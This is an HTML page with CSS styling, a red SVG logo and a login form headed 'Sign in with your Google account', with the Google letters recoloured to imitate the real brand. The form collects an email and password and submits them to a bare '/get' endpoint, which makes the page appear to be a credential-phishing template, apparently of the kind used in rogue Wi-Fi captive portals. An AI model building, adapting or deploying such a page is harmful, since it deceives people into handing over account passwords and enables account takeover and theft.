<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.brand-name {
  font-size: 42px;
  color: #D71A32;
  margin-left: 10px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #D71A32;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #D71A32;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #D71A32;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<?xml version="1.0" encoding="UTF-8"?>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="130.000000pt" height="95.000000pt" viewBox="0 0 1002.000000 711.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,711.000000) scale(0.100000,-0.100000)"
fill="#D71A32" stroke="none">
<path d="M0 3555 l0 -3555 5010 0 5010 0 0 3555 0 3555 -5010 0 -5010 0 0
-3555z m2753 2242 c-2 -4 -3 -14 -3 -22 0 -10 -11 -15 -35 -15 -38 0 -36 4
-55 -110 -16 -94 -18 -100 -45 -100 -21 0 -24 4 -19 28 3 15 11 62 18 105 l13
77 -33 0 c-26 0 -34 4 -34 18 0 10 2 21 4 23 7 7 191 3 189 -4z m102 -21 c3
-11 11 -47 17 -79 l13 -58 44 81 c39 71 48 80 73 80 32 0 32 7 13 -130 -8 -58
-15 -108 -15 -112 0 -5 -12 -8 -26 -8 -25 0 -26 1 -19 53 3 28 9 60 11 70 9
32 -4 18 -35 -39 -28 -48 -35 -55 -59 -52 -24 3 -28 9 -37 58 l-11 55 -13 -55
c-21 -90 -21 -90 -47 -90 -19 0 -24 4 -20 18 2 9 14 62 26 117 12 55 26 105
32 111 13 18 48 5 53 -20z m1695 29 c0 -2 -72 -485 -160 -1072 -88 -587 -160
-1076 -160 -1085 0 -17 19 -18 260 -18 255 0 260 0 260 -21 0 -22 -96 -679
-105 -716 l-5 -23 -930 0 c-911 0 -930 0 -930 19 0 20 97 678 105 719 l5 22
264 0 264 0 6 33 c3 17 49 320 101 672 52 352 98 655 101 673 l6 32 -267 0
-267 0 6 33 c3 17 28 185 56 372 28 187 52 346 55 353 3 9 147 12 670 12 366
0 665 -2 665 -5z m1250 -5 c0 -5 -25 -176 -55 -378 -30 -203 -55 -372 -55
-375 0 -10 -1058 -9 -1063 1 -3 5 106 745 112 760 1 1 240 2 531 2 345 0 530
-3 530 -10z m-660 -1067 c0 -5 -24 -165 -53 -358 l-53 -350 -283 -3 -283 -2 6
32 c3 18 26 175 51 348 26 173 48 321 50 328 3 9 69 12 285 12 154 0 280 -3
280 -7z m-2010 -2455 c0 -13 -3 -40 -6 -60 l-7 -37 -151 -3 -151 -3 -11 -67
-11 -68 214 0 c197 0 213 -1 213 -18 0 -18 -66 -468 -76 -514 -5 -27 -7 -28
-75 -28 -38 0 -69 4 -69 9 0 5 14 99 30 209 17 111 30 206 30 212 0 7 -46 10
-142 8 l-143 -3 -42 -275 c-23 -151 -42 -278 -42 -282 -1 -12 -141 -10 -141 2
0 13 129 876 136 913 l6 27 219 0 219 0 0 -22z m3385 -25 c-4 -27 -8 -54 -10
-60 -3 -10 -43 -13 -154 -13 l-149 0 -7 -47 c-3 -27 -9 -58 -12 -70 l-5 -23
216 0 c119 0 216 -2 216 -5 0 -3 -18 -125 -40 -272 -22 -148 -40 -271 -40
-275 0 -5 -33 -8 -73 -8 l-73 0 27 183 c15 100 30 199 33 220 l6 37 -145 0
c-94 0 -145 -4 -145 -10 0 -25 -81 -543 -86 -551 -3 -5 -34 -9 -70 -9 -59 0
-64 2 -64 21 0 24 129 897 135 917 3 9 57 12 225 12 l221 0 -6 -47z m-3000
-80 c-3 -16 -9 -52 -14 -80 l-8 -53 68 0 c37 0 70 -3 72 -7 2 -5 -1 -31 -5
-60 l-9 -52 -72 -3 -72 -3 -24 -158 c-16 -108 -20 -162 -13 -169 7 -7 27 -5
62 5 l51 15 10 -26 c24 -61 18 -76 -36 -94 -59 -20 -150 -23 -185 -5 -14 7
-33 28 -43 48 -17 36 -17 41 28 340 25 166 46 304 48 306 4 3 102 20 129 22
14 1 16 -5 13 -26z m4212 -5 c-3 -18 -9 -54 -13 -80 l-6 -48 71 0 72 0 -6 -47
c-10 -75 -8 -73 -84 -73 -80 0 -69 19 -96 -165 -9 -60 -18 -122 -21 -137 -7
-35 20 -44 75 -24 45 15 45 15 66 -43 l14 -39 -42 -17 c-57 -24 -158 -31 -197
-15 -35 14 -60 55 -60 97 0 24 80 594 85 600 2 3 104 20 129 22 15 1 17 -4 13
-31z m-3857 -152 l0 -35 54 25 c119 54 219 56 258 3 26 -35 25 -90 -6 -299
-39 -259 -26 -230 -107 -230 -49 0 -69 4 -69 13 0 6 13 100 30 206 16 107 26
199 23 204 -9 15 -74 2 -134 -26 l-54 -26 -24 -163 c-33 -231 -21 -208 -102
-208 -54 0 -69 3 -69 15 0 16 68 477 75 512 5 20 23 27 118 42 4 0 7 -15 7
-33z m792 10 c73 -35 100 -130 60 -206 -25 -47 -106 -94 -215 -127 l-88 -27 3
-35 c3 -35 4 -36 49 -39 40 -3 102 14 191 52 13 6 19 -1 28 -34 6 -23 14 -48
17 -56 11 -30 -156 -84 -263 -84 -109 0 -156 39 -162 133 -5 71 30 293 52 335
22 43 70 82 117 98 57 18 163 13 211 -10z m484 13 c32 -6 62 -13 65 -15 3 -2
2 -26 -4 -53 l-9 -50 -104 6 -103 6 -12 -26 c-17 -38 -8 -50 68 -92 134 -75
151 -100 133 -193 -21 -112 -58 -143 -180 -150 -73 -4 -170 9 -199 27 -11 7
-12 19 -4 57 10 55 2 52 115 33 81 -14 116 -7 128 27 15 38 -2 59 -80 100 -73
38 -116 79 -126 119 -9 37 15 132 42 164 40 47 145 63 270 40z m474 -2 c54
-12 55 -13 53 -45 0 -18 -4 -44 -7 -57 -5 -21 -9 -23 -39 -14 -37 11 -161 14
-176 4 -17 -10 -13 -60 7 -77 9 -8 47 -31 84 -52 109 -59 126 -100 93 -212
-25 -84 -77 -114 -194 -114 -59 0 -174 20 -187 32 -2 3 1 28 8 57 8 36 16 50
25 47 7 -3 43 -11 78 -17 81 -14 131 -6 140 22 14 44 -2 65 -86 110 -52 28
-89 55 -101 74 -30 49 -20 156 20 205 38 46 160 62 282 37z m1231 -34 c-3 -36
-3 -36 21 -21 12 8 44 27 70 42 54 31 53 32 62 -50 l5 -52 -82 -50 -82 -50
-25 -168 -25 -169 -73 -3 -73 -3 6 33 c9 57 75 498 75 507 0 9 111 30 120 23
2 -1 3 -19 1 -39z m534 33 l50 -12 -3 -49 c-2 -28 -5 -51 -7 -53 -2 -2 -36 0
-77 5 -108 12 -137 7 -144 -24 -10 -37 2 -51 81 -95 39 -21 83 -53 99 -70 27
-29 28 -35 23 -94 -9 -116 -55 -164 -167 -172 -67 -4 -191 10 -217 26 -8 5 -8
21 -1 60 10 48 13 53 32 48 99 -29 191 -30 208 -4 4 7 8 25 8 40 0 23 -9 33
-52 57 -105 58 -130 77 -145 105 -29 57 2 192 51 218 53 28 173 35 261 14z"/>
<path d="M4503 1930 c-26 -11 -44 -42 -54 -93 l-7 -38 32 6 c54 12 114 42 126
65 9 17 8 26 -5 46 -16 25 -50 31 -92 14z"/>
</g>
</svg>





  </div>

  <div class="form-container">

    <center><h1>Sign in with your <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
 account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue</button>

    </form>

  </div>

</div>
</body>
</html>
